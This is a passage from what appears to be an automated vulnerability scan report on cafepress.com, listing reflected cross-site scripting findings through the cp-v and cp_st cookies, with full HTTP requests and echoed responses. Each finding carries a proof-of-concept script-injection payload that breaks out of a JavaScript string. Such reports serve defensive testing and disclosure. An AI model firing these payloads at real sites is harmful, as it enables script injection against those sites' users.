__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63755
Date: Sun, 26 Dec 2010 13:48:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+framed-prints

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d2c</script><script>alert(1)</script>063b6447c14 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93d2c</script><script>alert(1)</script>063b6447c14; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63777
Date: Sun, 26 Dec 2010 13:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '93d2c</script><script>alert(1)</script>063b6447c14'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+greeting_cards

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61088"-alert(1)-"7f0a7ca94f0 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59694
Date: Sun, 26 Dec 2010 13:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+greeting_cards

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53143</script><script>alert(1)</script>28c54f936c4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=53143</script><script>alert(1)</script>28c54f936c4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59716
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '53143</script><script>alert(1)</script>28c54f936c4'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+hats-caps

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a79d4"-alert(1)-"d4edfd82353 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59421
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+hats-caps

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64dd9</script><script>alert(1)</script>4516792b671 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=64dd9</script><script>alert(1)</script>4516792b671; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59443
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
